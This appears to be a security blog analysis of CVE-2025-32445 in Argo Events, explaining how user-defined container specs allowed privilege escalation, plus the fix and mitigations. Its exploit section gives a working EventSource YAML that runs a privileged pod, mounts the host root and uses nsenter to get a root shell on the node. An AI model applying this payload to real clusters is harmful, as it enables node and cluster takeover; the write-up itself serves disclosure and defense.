CVE-2025-32445

Escaping the Event Loop: Complete Cluster Compromise in Argo Events

Alon Barad
Alon Barad
Software Engineer

Jan 8, 2026·5 min read

Executive Summary (TL;DR)

Argo Events allowed users to define the full Kubernetes Container spec in EventSources and Sensors. This meant anyone who could create an event listener could also define `command`, `args`, and `privileged: true`, effectively granting them a root shell on the underlying node. Fixed in v1.9.6 by sanitizing the API.

A critical privilege escalation vulnerability in Argo Events allows users with limited namespace access to inject arbitrary container specifications, leading to root-level node compromise and cluster takeover.

The Hook: When "Features" Become Backdoors

Argo Events is the event-driven workflow automation framework for Kubernetes. It’s the glue that connects your triggers (Kafka, Webhooks, S3, etc.) to your actions (Argo Workflows, Serverless functions). To do its job, it needs to spin up Pods—specifically EventSource and Sensor pods—that handle the listening and triggering logic.

Here is the catch: In the world of Kubernetes operators, there is a delicate balance between flexibility and security. Developers often want to allow users to tweak resources (cpu/memory) or environment variables. But sometimes, in a fit of "maximum flexibility," developers simply map a user-facing configuration field directly to the raw Kubernetes API structs.

CVE-2025-32445 is exactly that scenario. The Argo team allowed the template.container field in their Custom Resource Definitions (CRDs) to map directly to the core/v1.Container struct. This is the equivalent of a web server allowing you to edit its own nginx.conf via a POST request. It’s not just a bug; it’s an open invitation to takeover.

The Flaw: A Struct Too Far

The root cause is a classic case of Insecure API Design (CWE-250). When defining the EventSource CRD, the Go code essentially said, "Hey, whatever a standard Kubernetes container looks like, just let the user put that here."

Because of this direct mapping, the validation layer was non-existent for critical security fields. The Kubernetes Container struct includes powerful fields like:

  • command / args: The binary to run.
  • securityContext: The privileges (capabilities, running as root).
  • volumeMounts: What filesystems to touch.

The Argo controller, acting as the helpful butler, would take this user-supplied config, merge it with its own defaults using the mergo library, and happily ask the Kubernetes API Server to schedule the resulting monstrosity. The controller runs with high privileges (it creates pods), but it was allowing low-privilege users (those who can just create an EventSource in their namespace) to dictate how those pods ran.

The Code: The Smoking Gun

Let's look at the fix to understand the severity of the break. The patch in commit 18412293a699f559848b00e6e459c9ce2de0d3e2 replaces the standard Kubernetes struct with a neutered, custom version.

Before (The Vulnerable Code): The code likely utilized the standard library import directly in the API definition, or a struct that mirrored it completely.

After (The Sanitized Code): The developers introduced a restricted type io.argoproj.events.v1alpha1.Container. Notice what is conspicuously missing from the valid fields list:

// Restricted Container struct (Pseudo-code based on patch)
type Container struct {
    // Command and Args are GONE. 
    // Users can no longer override the entrypoint.
    
    VolumeMounts    []corev1.VolumeMount    `json:"volumeMounts,omitempty"`
    Resources       corev1.ResourceRequirements `json:"resources,omitempty"`
    // ... other benign fields ...
}

By explicitly removing command, args, and image from the accepted JSON/YAML schema, the controller ensures that the Pod only runs the intended Argo binary. Even if an attacker tries to inject command: ["/bin/bash"], the unmarshaller for the new struct will simply ignore it (or fail validation), preventing the execution flow hijack.

The Exploit: From YAML to Root

This vulnerability is trivial to weaponize. If you are a developer with access to a single namespace and permission to create EventSource objects, you own the cluster. There is no complex memory corruption or race condition here; it is pure configuration abuse.

The Attack Chain:

  1. Target: A generic K8s cluster running Argo Events < 1.9.6.
  2. Payload: Create an EventSource that mounts the host filesystem and executes a reverse shell.
apiVersion: argoproj.io/v1alpha1
kind: EventSource
metadata:
  name: pwn-cluster
spec:
  template:
    container:
      # Override the Argo binary with our shell
      command: ["/bin/sh", "-c"]
      # The payload: chroot into the host and spawn a shell
      args: ["nsenter -t 1 -m -u -i -n -p -- bash"]
      securityContext:
        privileged: true
      volumeMounts:
        - name: host-root
          mountPath: /host
    volumes:
      - name: host-root
        hostPath:
          path: /
  1. Execution: Apply this YAML. The Argo Controller sees a new EventSource, reconciles it, and spawns a Pod.
  2. Result: The Pod starts. Instead of listening for GitHub webhooks, it executes nsenter. You are now root on the underlying Kubernetes Node. From there, you can grab the kubelet credentials or read etcd data if available.

The Impact: Why This Is a 9.9

A CVSS score of 9.9 is reserved for the "End of Days" scenario. Why does this qualify? Because it breaks the fundamental promise of Kubernetes multi-tenancy.

Privilege Escalation: You go from Namespace Editor (Low Priv) to Node Root (High Priv).

Scope Change (S:C): Once you compromise a Node, you effectively compromise the Cluster. You can access secrets from other namespaces scheduled on that node, potentially steal the Service Account tokens of system components, or manipulate the container runtime directly.

This isn't just about reading data; it's about integrity and availability. An attacker could wipe the node, deploy cryptominers, or silently backdoor the cluster configuration. If your organization uses Argo Events to manage production deployments, this flaw allows an attacker to inject malicious code into your software supply chain.

The Fix: Closing the Window

The remediation is straightforward but urgent. You must upgrade to Argo Events v1.9.6 immediately. This version enforces the restricted container schema.

[!NOTE] Residual Risk: The patch removes command and args, but it still allows volumeMounts and securityContext in some capacity. While you can no longer easily execute a shell, you might still be able to mount sensitive volumes if the Pod template allows it. Defense-in-depth is required.

Defense in Depth: Don't rely solely on the software patch. Use Policy Enforcement (Kyverno, OPA Gatekeeper) or Pod Security Admission (PSA) to ban privileged pods and hostPath volumes globally. If Argo Events hadn't allowed privileged: true, this exploit would have been significantly harder, regardless of the API flaw.

Fix Analysis (1)

Technical Appendix

CVSS Score
9.9/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS Probability
0.11%
Top 70% most exploited

Affected Systems

Argo Events ControllerKubernetes Clusters running Argo Events < 1.9.6

Affected Versions Detail

Product
Affected Versions
Fixed Version
argo-events
argoproj
< 1.9.61.9.6
AttributeDetail
Attack VectorNetwork (API)
Privileges RequiredLow (Namespace Edit)
CVSS v3.19.9 (Critical)
CWECWE-250: Execution with Unnecessary Privileges
ImpactCluster Admin / Host Root
Patch StatusReleased (v1.9.6)
CWE-250
Execution with Unnecessary Privileges

The software performs an operation at a privilege level that is higher than the minimum level required, which creates a new attack surface.

Vulnerability Timeline

Fix commit pushed to GitHub
2025-03-21
Security Advisory Published
2025-04-15
NVD Analysis
2025-04-16

Subscribe to updates

Get the latest CVE analysis reports delivered to your inbox.